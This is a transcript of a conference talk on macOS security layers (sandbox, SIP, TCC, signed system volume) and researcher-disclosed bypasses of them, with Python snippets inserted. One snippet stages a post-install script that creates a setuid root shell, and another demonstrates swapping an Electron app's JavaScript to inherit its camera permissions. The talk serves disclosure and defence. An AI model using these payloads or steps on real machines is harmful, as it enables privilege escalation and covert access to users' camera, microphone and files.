Computest, Thijs Alkemade and Daan Keuper — they're going to explain the one and only non-hackable machine people are using on a daily basis, macOS, and show that it's actually not non-hackable. They're going to explain how to escape the sandboxes, and how to bypass the Transparency, Consent, and Control mechanisms. I don't know who starts — Daan? All right, thank you. So my name is Daan Keuper. I'm here with my colleague, Thijs Alkemade. We work for Computest, which is a Dutch cybersecurity full-service company. We do everything from pen testing to incident response. If you have any further questions after this talk, we have a big tent on the retro square full of arcade games. So if you have any questions, just drop by. We'll give you a beer, and I can answer all your questions. So today, we would like to talk to you about the local security measures in macOS. Suppose you have code execution as an unprivileged user on macOS. How can you abuse that position to escalate privileges to a higher-privileged user, to bypass a sandbox, or to bypass the new TCC mechanism in macOS? The presentation is divided in two parts. First I will explain the local security mechanisms that are currently implemented in macOS, and then Thijs will jump into the cool stuff by actually showing how you can bypass them. So there are a couple of security mechanisms in macOS, and I'm going to cover them one by one. The first one is code signing. Code signing was introduced in Mac OS X Lion, and it means that every binary now has a cryptographic signature. If you want to run an unsigned binary, the user first has to accept that by going to System Preferences and saying that they want to run the binary. So it's not actually mandatory for everything, but most applications will have a valid signature. The verification for this is handled by a kernel extension (AMFI) and the amfid daemon.
Apart from code signing, some apps also have entitlements. Entitlements are very fine-grained security rights that an application can have. It's a key-value dictionary, and it's included in the code-signing step. Many of the entitlements are only allowed on binaries that are signed by Apple. Typically, if some part of the operating system needs special permissions, Apple gives that permission to a very small service, which communicates over XPC. The larger binary doesn't actually have the entitlements to do the important stuff in the operating system; that's handled by a very small daemon, to make the attack surface smaller. But if an application has a specific entitlement and it is vulnerable, then you can copy that binary to a machine you have access to, exploit that vulnerability, and you will have the entitlement as well. This is how you can see what code signature a binary has — is it actually readable on the screen? It's just a cryptographic signature. You can also see the entitlements a binary has. This is the ps binary, and it has a specific entitlement to read process information of other processes. It's the task-ports read entitlement, and that is only given to a few binaries on your macOS installation. The signature itself is included in the Mach-O binary, in a special section called the code signature. You can extract it and see the certificate yourself if you want to. So the executable itself is signed, but in an app bundle all the resources are signed as well; the resource signing is stored in a separate file within the app bundle. When you launch an application, the interesting part is that only the actual binary is checked for a valid signature. Resources are only checked when the app is first downloaded or first run; after that, only the signature of the binary itself is validated.
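As a side note, the entitlements blob that can be dumped from a binary is just an XML property list, so it is easy to inspect programmatically. Below is a minimal sketch in Python; the plist here is a hard-coded sample, and the task-ports key is only illustrative of the kind of entitlement the talk mentions for ps, not copied from a real binary.

```python
import plistlib

# A sample entitlements plist, in the XML form codesign can dump on macOS.
# The key below is illustrative of the task-ports read entitlement the
# talk mentions for /bin/ps; it is not copied from a real binary.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
 "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>com.apple.system-task-ports.read</key>
    <true/>
</dict>
</plist>
"""

def entitlements(plist_bytes: bytes) -> dict:
    """Parse an entitlements plist into a plain dictionary."""
    return plistlib.loads(plist_bytes)

print(entitlements(SAMPLE))  # {'com.apple.system-task-ports.read': True}
```

On a real macOS system you would obtain the XML with something like `codesign -d --entitlements - /bin/ps` and parse that output instead of the sample.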
Apart from that, you have something called the hardened runtime, which is now mandatory for applications in, for example, the Mac App Store. Its purpose is to protect against all variants of process injection. If you have enabled the hardened runtime for your app, it prohibits the use of certain environment variables to override library loading, but it will also disable just-in-time compilation, it will check code signatures of libraries as well rather than only the binary, et cetera, et cetera. Then you have the sandboxing implementation, which was introduced in Leopard, and it uses an allow list for the syscalls a process can use. It's handled by a kernel extension, but most of the parsing is done by a user-space daemon. The sandbox is configured using a profile, which is written in the Scheme language, and most profiles can be found in the /System/Library/Sandbox/Profiles directory. The sandbox has hooks all across the kernel source tree, so it can be very fine-grained in what it will actually allow or block. A profile can depend on the entitlements of the application: if your application has certain entitlements, it can use a different sandbox profile that allows you to read certain files or use certain syscalls, for example. This is an example sandbox profile — for iMessage, in this case. It has some read and write permissions, and it has some permissions to communicate with other services. System services from macOS often have a custom sandbox profile. All apps that are installed from the App Store get the fixed Mac App Store sandbox profile, which is just a general profile. But apart from that, hardly any app that is not installed via the App Store uses a sandbox; exceptions are things like Chrome or Firefox, et cetera. You also have containers, which reroute your home directory to a container within your Library folder. But this is actually not a security mechanism.
This is just to make the sandbox implementation easier for already existing apps. Another important security measure is System Integrity Protection, or SIP. It was released in El Capitan, and it was originally meant to create a trust boundary between root and kernel level. It is often referred to as rootless, or internally as CSR. It restricts filesystem modifications, kernel and system extension loading, process debugging, et cetera. The idea here is that even if you have root privileges on your account, you're still not able to alter the most important parts of your system. The reason for this is that on most macOS installations there's only one user, which is also the administrator user. So typically you would be only one exploit away from getting full system access, but SIP prevents you from modifying important system files. For example, if you try to remove your shell, it will say it cannot do that, and that's because the /bin directory and all the binaries in there are protected by System Integrity Protection. You can also not attach a debugger to system processes, which is likewise prevented by SIP. Actually, SIP is just a sandbox profile, called the platform profile; the configuration can be found on your system. It's enabled at boot using an NVRAM variable, so you could disable parts of SIP by just changing that variable. However, changing that variable is protected by SIP as well, so you will need to boot into another operating system, or one that allows you to disable this — for example, the macOS recovery installation. In order to allow SIP to work, the entitlement system is used as well, because, for example, the ps binary needs some very specific permissions, for which entitlements are used. SIP also prevents apps from reading certain sensitive locations, like your mail database, et cetera. These are called data vaults.
Only apps with very specific entitlements can read and write in those locations. So even if you have full system access, that still doesn't mean you can read the user's local email database, for example. You can think of SIP as something like a reverse sandbox: the sandbox limits what functionality a process can use, while SIP tries to protect functionality by limiting which processes can use it. Relatively new, or less well known, is TCC: Transparency, Consent, and Control. Those are the pop-ups you might have seen — this application wants access to your Downloads folder, or to your camera, et cetera. It was introduced in Mojave and is like a dynamic sandbox for privacy-sensitive subsystems. The implementation looks at your bundle ID and your developer ID, and if that matches the internal TCC database, the permission is granted. Otherwise, the user will get a pop-up to confirm whether they want to allow a certain action or not. For this, your system runs a TCC daemon. Typically you will have multiple daemons running: one for each user, and one for the system user — for the entire system. They use an internal SQLite database to actually manage those permissions. You are, however, not able to just change that database yourself, because the database itself is protected by System Integrity Protection. So what happens if an app actually requests access to your microphone or your camera? Well, the way it's implemented: if you want to access the microphone, you have to ask Core Audio for access. Core Audio will forward that request to the TCC daemon, which will look up whether this app has that permission or not. And if the app doesn't have the permission yet, it will forward the request to the UI notification service. That's the only service that's allowed to show the pop-up and to make changes to the TCC database. You can see that in the entitlements of the TCC daemon.
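To make that lookup flow concrete, here is a toy model of it in Python. Everything here is illustrative — the real store is tccd's SIP-protected SQLite database, not a dict — but it shows the property abused later in this talk: permissions are keyed on the bundle and developer identifiers only, so the app's version and on-disk location play no role.

```python
# Toy model of the TCC lookup just described. The real store is an
# SQLite database managed by tccd and protected by SIP; this dict only
# stands in for it. Note what is in the key -- and what is not: the
# app's version and path are absent.
tcc_db = {
    ("com.example.chatapp", "TEAMID1234", "kTCCServiceMicrophone"): True,
}

def check_access(bundle_id, team_id, service, ask_user):
    key = (bundle_id, team_id, service)
    if key in tcc_db:
        return tcc_db[key]                   # already decided: no pop-up
    decision = ask_user(bundle_id, service)  # pop-up via the UI service
    tcc_db[key] = decision                   # remembered for next time
    return decision

# A copied or modified app with the same identifiers reuses the grant,
# so the prompt callback is never invoked:
granted = check_access("com.example.chatapp", "TEAMID1234",
                       "kTCCServiceMicrophone", ask_user=lambda *_: False)
print(granted)  # True
```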
Only the Notification Center UI is allowed to make decisions about what gets into the TCC database and what doesn't. After that, the TCC daemon will actually make the changes in the database itself, but the decision is handled by the notification center. Another security feature is the signed system volume. The system volume is the volume where the macOS installation is stored. This is different from how it used to be: typically, you would have one partition containing both the operating system and all user files. Now that's different — those have been split. You have a system volume containing all the macOS installation files, and you have your data volume containing all user files. Those are overlaid using firmlinks, most commonly described as bi-directional wormholes for path traversal, because every path points to either the system volume or the data volume. The way it's implemented is that the system volume is mounted read-only, so you are not allowed to make changes to the system partition. However, that also means that if you have a kernel vulnerability, for example, you could just remount the system partition and then make changes. So they upgraded this by also adding a cryptographic signature over all data on the system volume. This is implemented using a Merkle tree, which is validated during boot. The hashes of every file are stored in the metadata of APFS, and the root node is called the seal. The seal is signed by Apple. And if the seal is broken — if you do make changes to the system partition, for example because you have kernel privileges — then the system will restore from a previous snapshot the next time you reboot. So how are updates implemented, then?
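As an aside, the seal check just described can be sketched as a tiny Merkle tree. This is only the shape of the mechanism — the real signed system volume stores per-file hashes in APFS metadata and the seal is signed by Apple — but it shows why any single-file change breaks the root hash.

```python
import hashlib

# Tiny Merkle tree: hash every "file", then combine the hashes pairwise
# up to a single root. The root hash plays the role of the seal.
def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def merkle_root(leaves):
    level = [h(leaf) for leaf in leaves]
    while len(level) > 1:
        if len(level) % 2:              # duplicate the last node if odd
            level.append(level[-1])
        level = [h(a + b) for a, b in zip(level[::2], level[1::2])]
    return level[0]

files = [b"/bin/ls contents", b"/bin/sh contents", b"/usr/lib/dyld contents"]
seal = merkle_root(files)

# Changing any single file changes the root hash, "breaking the seal":
tampered = merkle_root([b"/bin/ls contents", b"EVIL", b"/usr/lib/dyld contents"])
print(seal != tampered)  # True
```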
Well, your system has a separate update volume, which is a snapshot of your current macOS installation. Patches are applied to that snapshot, and if everything succeeds, the snapshot is sealed and it will be booted. However, if the update fails, the system can use the previously stored snapshot, which still has a valid seal, and boot from that. You can check whether your current snapshot has a valid seal using diskutil. So these are the most common macOS local security systems that try to prevent attackers from getting full access to your system. The upcoming version of macOS will have some extra features; I think these are the main ones. The first one is that system apps will no longer run from non-default locations. So if you take a system app and move or copy it to your home directory, it will no longer launch. Secondly, macOS will now notify you when launch daemons are being added to your system, and they will be easier to manage within System Preferences, so you know which applications will start at boot. Most importantly, Gatekeeper will now prevent modifications to apps after the first launch. Typically, Gatekeeper is only used at the initial launch — the first time the application is launched. But now Gatekeeper will prevent modifications even after the application has already been started once. This is implemented using SIP, and modifications to apps are only allowed if the app making the modification is signed with the same certificate as the app you want to change. This means that apps can update themselves, but apps cannot make changes to other apps. There is an allow list for this: for example, if you have an update service like Sparkle, you can say, OK, I also accept that certificate to make changes to my app. So to give you an overview, these are the most important security mechanisms.
You have code signing to make sure that the application was published by a specific organization. You have the sandbox, which handles static permissions. You have SIP to guarantee the integrity of the system as a whole, TCC for user-controlled permissions like camera access, et cetera, and the signed system volume to prevent modifications of system files. This is the bug bounty description from Apple. As you can see, they really believe in TCC, because a bounty for TCC can go up to $100,000 if you find a way to access the camera even though your application doesn't have the permission for it. So Thijs will now show you how you can actually do that. Thijs. Yes, thank you. So this was all theory, and it's of course much more interesting to have some practical examples to really understand how these security measures work. We're going to look at a couple of different vulnerabilities, to illustrate whether the security measures work or not, and whether they were bypassed or prevented something. Most of these were found by us, but occasionally we mention vulnerabilities found by other people as well; in those cases, we hope to make that clear. First of all, Electron. Electron is a framework you can use to develop applications, and it's basically a Chrome runtime combined with a JavaScript web application, fused together to create an application. As Daan just mentioned, the permissions for TCC are stored in a database based on the bundle identifier — something that identifies an application — and the developer identifier, like a team or an organization. But the version of the application, or the location where the application is stored, are irrelevant here. Also, the code-signing check after the first launch only checks the executable itself, not all of the embedded resources. The libraries and frameworks are checked if the hardened runtime is used.
But this does mean that if you have some interpreted code, like JavaScript, or you embed some Python scripts in your application, then that code is not validated by the code-signing check that is performed when you launch an application. And as I just said, Electron applications contain a lot of JavaScript for their code, which means those resources are not checked when you launch the application. So in basically every Electron app, you can do the following attack. You copy the application to a writable location — you can do this if you already have some access to the machine, so you cannot do this remotely. You take out the JavaScript and replace it with some malicious JavaScript. You launch the modified application, and now you have the TCC permissions that the original application had. So even if your application doesn't have access to the webcam, if you copied an application that did have access to the webcam, then you can also access the webcam without having to ask the user for permission. And for some reason, people really love to write Electron applications that have access to your webcam and your microphone — all of these are developed using Electron. As a user, there's really not a good way to protect yourself from this. But luckily, there have been some developments on fixing it. Electron is working on something called ASAR integrity, which is basically a code-signing step of their own over their resources that can be checked when the application is launched. But as far as I know it's not yet officially supported, so it also doesn't work very well. This is a technique you can apply more generally as well. We're just bashing Electron here, but it can be used on many applications, because you can often find an older version of an application that was not protected as well — for example, an older version that didn't use the hardened runtime.
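The copy-and-swap attack steps can be sketched as follows, using a fake bundle in a temporary directory. The Chat.app name and the app.asar path are illustrative, though the layout mirrors a typical Electron bundle; no real application or signature check is involved here.

```python
import pathlib
import shutil
import tempfile

# Fake Electron-style bundle in a temp directory. The "signed" native
# executable and the app.asar JavaScript archive are just text files here.
tmp = pathlib.Path(tempfile.mkdtemp())
orig = tmp / "Applications" / "Chat.app"
(orig / "Contents" / "Resources").mkdir(parents=True)
(orig / "Contents" / "MacOS").mkdir()
(orig / "Contents" / "MacOS" / "Chat").write_text("signed native binary")
(orig / "Contents" / "Resources" / "app.asar").write_text("legitimate javascript")

# Step 1: copy the bundle to a writable location. The bundle and team
# identifiers -- the only things TCC keys on -- are unchanged.
evil = tmp / "Downloads" / "Chat.app"
shutil.copytree(orig, evil)

# Step 2: swap the interpreted code, which the launch-time signature
# check does not cover.
(evil / "Contents" / "Resources" / "app.asar").write_text("malicious javascript")

# Step 3: launching the copy would now run attacker JavaScript with the
# original app's TCC grants (webcam, microphone, ...).
print((evil / "Contents" / "Resources" / "app.asar").read_text())
```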
So with an older version like that, you can swap out a library for a malicious one, launch the application, and abuse its permissions. Hopefully the changes in Ventura that Daan mentioned, which should prevent modification of those files in an application, will prevent this attack. Of course, it's still in beta, so we don't really know yet if it's going to work, but it looks like Apple is making some steps to make an attack like this harder. The next one is about Adobe Acrobat and privileged updaters. There are instances where Macs are used by people with a normal user account instead of an admin account — for example, a kid who has a computer while the parents have the admin account, or a computer in a school, something like that. But a non-admin user is not allowed to change the Applications folder, and this can be a problem if you have an application that wants to update itself. There are many applications that you really want to update as quickly as possible: for Chrome, or something like Adobe Acrobat, there can be nasty exploits that are dangerous, and you want to protect against them by updating quickly. But if the admin never logs into the machine, how can those applications update, given that they can't write to the Applications folder? How can you install updates in this case? Well, many vendors found the same solution: you install a very small, separate service, and you run that service with root privileges, and you use it only for the installation step. So you have this one service that can update the application, while the rest of the application runs as a normal user. Now, it's important that you do this securely, of course — not every application should be able to elevate its privileges. There are basically two things that you need to check here. The application downloads an update, and then it hands that over to the service.
And there are two things it needs to check. First of all, it should check whether the request really comes from the original application; if something else — say, some malware — is requesting an update, it should be ignored. And it should also make sure that the package has not been manipulated in some way, for example by checking a cryptographic signature. Even though there are only two things that can go wrong here, it is quite common that both of them are implemented incorrectly. What you often see is an incorrect code-signing check, or some form of process injection, combined with a time-of-check/time-of-use vulnerability. Basically, that means it checks the signature, but then, before it actually uses the installation package, the package is changed: it checks something first, it's correct, and then before it installs it, it was modified. If both of those things go wrong, then you often have a way to install a package, and that usually means you can also elevate privileges to root. It turned out that Adobe Acrobat was vulnerable. This was found by Yuebin Sun. There was no code-signing check at all — that check was completely missing — and it was possible to use a symlink for the update package. So it would check the signature on the package, and then you could quickly change the symlink, and it would install something different than what it had checked. There's also a nice write-up about this vulnerability that Yuebin Sun published. Then Adobe made some changes, but they didn't really do everything correctly. At around the same time, Csaba Fitzl and I both looked at it, but he was just a little bit faster in reporting it to Adobe. The code-signing check they implemented was wrong: they used the codesign binary in a way that was easy to manipulate. And it was also possible to create a hard link to the update package.
Because they moved it to a different location instead of copying it, hard links were maintained, so you could keep modifying the update package after they had checked it. A little bit later, I looked at it again, and what I noticed is that they had started writing the correct code-signing check, but they had just left it unfinished for some reason: it would always return true. Apparently they were still working on it, but released it anyway. I also found a very neat trick to still modify the package in a time-of-check/time-of-use way. If you have a file descriptor to a file — so if you open a file — the system checks whether you have permission to read or write that file, and then you get an open file descriptor. But if the file is then moved and the permissions are changed, as long as you have that file descriptor, you can keep modifying that file; until you close it, you still have access. And because they moved the file, you could keep this file descriptor open and still rewrite the contents of the file between the check and the use. What this really illustrates is the idea that you can separate dangerous operations out into a small privileged process and use XPC to communicate with it — but also that code signing is a very important part of making this work correctly. There have been many applications with similar vulnerabilities in the past: Google Chrome at some point had vulnerabilities like this, and the Microsoft AutoUpdate tool and Microsoft Teams have their own updaters that had similar vulnerabilities. Another thing to mention is that nothing will uninstall that updater if you delete the application from the Applications folder. So if you have ever used Adobe Acrobat and then deleted it, you may still have a very old, outdated, vulnerable version of that updater installed.
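The file-descriptor trick is easy to demonstrate on any POSIX system. In this sketch, a rename and chmod stand in for the helper's "check"; the names and payloads are of course made up for illustration.

```python
import os
import tempfile

# Stand-in for the update package in a temporary directory.
tmp = tempfile.mkdtemp()
pkg = os.path.join(tmp, "update.pkg")
with open(pkg, "w") as f:
    f.write("benign payload")

fd = os.open(pkg, os.O_RDWR)        # attacker opens the file first

# The helper "checks" the package: here, moving it out of reach and
# making it read-only stands in for the signature check.
moved = os.path.join(tmp, "staging.pkg")
os.rename(pkg, moved)
os.chmod(moved, 0o400)

# The old descriptor still refers to the same file, with the access
# rights it was opened with -- so the contents can be rewritten after
# the check but before the "use" (the installation).
os.lseek(fd, 0, os.SEEK_SET)
os.write(fd, b"malicious payload")
os.close(fd)

with open(moved) as f:
    print(f.read())                 # malicious payload
```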
And any application can still communicate with that leftover updater, because it still exists. Maybe the changes in Ventura around launch daemons will make this easier to manage — I haven't checked that, but it would be very welcome to be able to easily remove stuff like this, because normal users are not going to check those folders. The next one is in StorePrivilegedTaskService. This was a service installed with macOS itself, so not a third-party application. It's a service similar to the privileged updaters from the previous example, but this one is used for installing updates from the Mac App Store. The service runs as root, and it can do a couple of things, similar to before: they needed root privileges for certain steps, so they created a separate privileged tool to do just those steps, and other processes can request it to do them. For example, it can move an application to a different location; it can remove the quarantine flag, which is applied to files you have downloaded from the internet; and it does something with managing receipts. This service was also missing any check on what application was asking it to do something, which made it very easy to write a sandbox escape: if a sandboxed application creates a new file, it's always quarantined, just as if you had downloaded it — so you can write a new application, ask this service to remove the quarantine flag, and then launch the application to escape the sandbox. But we found this and we thought, well, we can probably do more, because we can also move things around as the root user, and that's generally something you can use for privilege escalation. It turned out to be quite a challenge to do correctly, though, because this process was sandboxed. What that basically meant is that we could only move directories, and not separate files, which made it quite tricky.
This is one part of the sandbox profile of this service. The most useful part here is the second regex, which basically means that we can move any directory as long as its path contains .app somewhere. We spent quite a lot of time on getting this to work. We tried a couple of different things, but we had to deal with the signed system volume, which means that we cannot overwrite any existing applications. You also want something that runs as root, and applications generally don't run as root — so there were somewhat conflicting requirements that made it hard to find what we could do. Then at some point I found something I thought could work: I could overwrite MRT.app. This is the Malware Removal Tool, an application on macOS that can be used to delete malware from your computer, and it can be updated independently of the rest of the system, which means it's not on the system volume. So I developed this exploit and sent it to Apple, and then they asked me: well, does it also work with SIP on? And it turned out that in the virtual machine I was using, I had turned off SIP to debug something, and, yeah, it wouldn't work on a system with SIP on. So I had to start looking again. Finally, after a while, I found that I could create a new authorization plugin and then auto-activate it, and that would give me root privileges. What this really illustrates is that the signed system volume and SIP made it really hard to develop this attack. The sandboxing also made it quite difficult, of course, but in this case the sandbox profile was really way too broad: a lot of things were allowed that weren't intended to be allowed, and they could have made it a bit stricter — which is what they did when they finally patched this. The next one is a bit of a weird one. It's about open and save panels. This is an open panel.
It looks really boring — you see one a hundred times every day — but it's actually technically quite interesting, because in a sandboxed application, the application cannot see all your documents. You want to open a document in that application, but the application cannot know what documents you have, because it's sandboxed. The way Apple solved this is with this window: the window is part of the application, but the contents of the window are actually drawn by a different process. There's an open and save panel service, which does have access to all files — it's not sandboxed — and it draws the panel from a different process to show you all of the files you have. When you select a file and click Open, the application gets temporary access to that file so it can open it. This kind of technology is used throughout the system to separate different parts into different components with different privileges, while making it look like one thing in the UI. But apparently they didn't think about the security of this very much, because there was a method you could call — the class is a remote view, from the point of view of the application — and one thing you could call was snapshot. If you did that, it would take a picture of the contents of the view and return it to the application. So in this case, when you open an open panel, you can get a list of all the files the user has and get previews of certain files. This was clearly not intended for sandboxed applications, because the entire reason this exists is that the application can't know what documents you have — but they added this method to take a snapshot anyway. We created a demonstration of this here: we open a panel, and now we copy the view into our own window. This part is the application, and that part is a remote view, as I described earlier.
What the open panels really illustrate, and what I think is interesting about them, is that sandboxing creates all sorts of weird attack surfaces that not many people will look at. There are all these weird edge cases where things that are sandboxed still need to do certain things within the UI, so there are a lot of parts that haven't got much attention, either from Apple or from security researchers. Now, the next one is a sandbox escape that we found and reported to Apple, which is interesting because it actually abuses the sandboxing container functionality. In a sandboxed application on macOS, you're allowed to launch a new process — on iOS you cannot do this, but on macOS you can — but that process inherits the same sandbox as your application. So if you cannot access a file, you can't just use cat to read that file. One interesting consequence is that you can also launch another application from within your own sandbox. This generally works, except for one thing: you cannot initialize a sandbox if you are already sandboxed — the system will terminate that process. So if you try to launch Safari from within a sandboxed application, the kernel will terminate it, because Safari tries to sandbox itself, but it can't do that while already sandboxed. Just as an experiment, I tried to launch all applications from within a sandboxed application, and I noticed something quite interesting: System Preferences was working just like normal. Many other applications failed to run, or hung, or some error popped up — but System Preferences was working. And System Preferences is a very sensitive application, because you can manage many security and trust settings there, and they all worked, even within my sandbox. So I tried to figure out why, and it turned out that, similar to the remote view we saw before, System Preferences is also separated into many different processes.
There is System Preferences itself, but every panel of System Preferences is another process, and there can even be another level of indirection beyond that. And even though System Preferences was now suddenly sandboxed, the other services were not, and could just work normally. The way this works is that the Apple-installed System Preferences panels are those separate services — a separation of services. But third parties can also install new plugins for System Preferences, and those are bundles, which is quite different from the XPC services, because a bundle is basically just a plugin that gets loaded. Now, this was a fun trick, but it's no sandbox escape yet. But I noticed something being created in the container folder of my application: there are some cache files left over by System Preferences, including one called the user cache. This is a list of all of the third-party System Preferences plugins that are installed, and it was created within the container of my application, which meant that I could also manipulate it — modify it or create new content — and then launch System Preferences. The reason this file exists is so that it doesn't need to index all of your plugins every time you launch it. But if I create this file, then I can inject my own new System Preferences plugin, and when it launches, it will think there's a new plugin, namely my bundle. But then I still needed to activate it; I didn't want to wait for the user to click on it. So I needed one more step. There's a URL handler you can use to open certain System Preferences panes, but it didn't work for those third-party preference panes. There was something else I could use, though: you can add an alert to System Preferences, and whenever a new alert is added, the next time you open the application it will automatically open the preference pane that added that alert.
And I could do that from a third-party preference pane. So, basically, the attack is as follows. I create a new cache file that says there's a new plugin, namely my bundle. I add an alert for it, and then I start System Preferences from within the same sandbox, which means it loads that plugin into an unsandboxed process, and therefore my code runs unsandboxed. We also have a video of that. First it demonstrates that the process really is sandboxed. Then we open System Preferences, but it was really quick: it immediately exited and opened the Calculator, to demonstrate that we can execute arbitrary code. And the fix was really simple: they just check if it's sandboxed, and if it is, then it quits immediately. It's probably just three lines of code or something like that. Now, the next part I have to keep a bit vague, because the vulnerabilities are not all fixed by Apple; they're still working on the fixes. They should get fixed with Ventura, but I'm not completely sure of that yet. But what I want to talk about is a generic process injection technique, the kind that's possible through vulnerabilities like these. Process injection is basically the way that one application can execute its code as if it is another application. We've already shown that you can use that to communicate with a privileged helper tool if you can inject into the application that's allowed to. You can abuse the TCC permissions of, say, an Electron application. But we wanted to investigate what you can do if you have a generic technique and can inject into any application, even Apple's. And we found some neat tricks to use that to escape the sandbox, elevate privileges to root, and bypass the SIP file system restrictions. The sandbox escape is a bit boring, because if you're sandboxed and you can inject into a non-sandboxed application, yeah, then you have escaped the sandbox already. 
So, I can't really disclose much more of those details, but hopefully we can publish more about this soon. But privilege escalation, we can talk a bit more about that. There are certain applications that have entitlements for the Authorization Services, which can include the permission to install Apple software, which basically means that they can install packages signed by Apple without the user having to enter their password. So as long as it's signed by Apple, they can silently install a new package. This is used, for example, by Boot Camp Assistant, or to install the Command Line Developer Tools. And there's also a nice package we can use. It was found by Ilias Morad. If you install this package to a disk, then in its post-install script, so after it has performed the installation, it will run a script from the disk you installed it to. It checks if a certain file exists, and then it runs it. But it doesn't actually check that the disk you install it on is a macOS disk, so you can just install it to a disk image or a RAM disk, create a shell script there, and then it will execute that as root. So this is a way to take one entitlement and use it for privilege escalation. And finally, we found an application, macOS Update Assistant. We found this on a beta installation disk image, and it has a very powerful entitlement. This basically means it can access every SIP-protected file, and the entitlement is also inheritable. So any processes it spawns can do that too, which is easy for us, because we can just spawn a shell. This application can then be used to, yeah, write to any SIP-protected location. And hopefully the restrictions that Daan mentioned for Ventura, about processes being run in a different environment, should prevent this as well. We have a quick video of that. I hope this is readable. 
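The staging step of that post-install trick can be sketched as follows: before triggering the Apple-signed package install onto an attacker-controlled volume, you drop an executable shell script at the path the package's post-install script later runs. The relative path `usr/local/bin/hook.sh` and the payload are placeholders; the talk does not name the real path the package checks.

```python
import stat
from pathlib import Path

# Hypothetical payload: the package's post-install step runs this as root.
PAYLOAD = """#!/bin/sh
# Executed as root by the package's post-install script.
cp /bin/sh /private/tmp/rootshell
chmod u+s /private/tmp/rootshell
"""


def stage_volume(mount_point, hook_relpath="usr/local/bin/hook.sh"):
    """Place an executable payload script on the target volume.

    `mount_point` would be the mounted disk image or RAM disk;
    `hook_relpath` is a placeholder for the path the installer
    package actually checks and executes.
    """
    script = Path(mount_point) / hook_relpath
    script.parent.mkdir(parents=True, exist_ok=True)
    script.write_text(PAYLOAD)
    # Mark the script executable so the post-install step can run it.
    mode = script.stat().st_mode
    script.chmod(mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return script
```

After staging, the attacker would install the Apple-signed package onto that volume through the entitled application, and the script runs as root.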
So, first it demonstrates that it's a sandboxed application. Then the first step escapes its sandbox and elevates privileges, which is a bit slower because of all of the disk image stuff. And then the next step is the SIP bypass. As you can see, it has spawned a root shell, and not just a root shell: we also demonstrate that we can write to the system policy configuration directory. This directory is protected by SIP, and it's used to keep track of the kernel extensions that you have approved. So if we modify one of these files, we can load a kernel extension without user approval. Combine this with a vulnerable kernel extension and you have kernel code execution. And all of this from basically just one type of vulnerability. Now, very quickly, because I'm a bit low on time, our thoughts on this. TCC is an interesting idea, but it's still pretty new, and many third-party developers are not aware of it. So many applications are vulnerable, which makes it easy to abuse their permissions. Sandboxing is very powerful, but there are also very weird edge cases that are not being looked at, because many people look at iOS sandboxing, so the lower, kernel-level stuff is looked at often. But the higher-level stuff, like taking screenshots of open panels, is not looked at as much. Finally, process injection is an interesting technique, and as far as I know, a similar security boundary between processes doesn't exist on Linux or Windows, though as far as I know, we're not very specialized in those. So these types of vulnerabilities don't really apply there, which basically means that the fact that these techniques don't work there doesn't make those systems less secure. Yet, on the other hand, what we also showed at the end is that those process injection vulnerabilities can have a very large impact, because you can use the same technique for escaping the sandbox, privilege escalation, and bypassing SIP. So, thank you. 
I think we are out of time, but if you have any questions, then feel free to visit us at our tent. Yeah, thank you, guys. Just one thing: we have some write-ups about a couple of these vulnerabilities on our blog, and some other cool stuff, like the things we talked about yesterday and the day before, so check it out if you want to read more. And this is the link, right? Definitely. I'm gonna switch back to Windows. We can take one or two questions if people are interested in asking a question. We have so many questions, but I will be in your tent tonight. Let's give a final applause for Daan and... Thank you. Thank you. Nice. Thank you very much.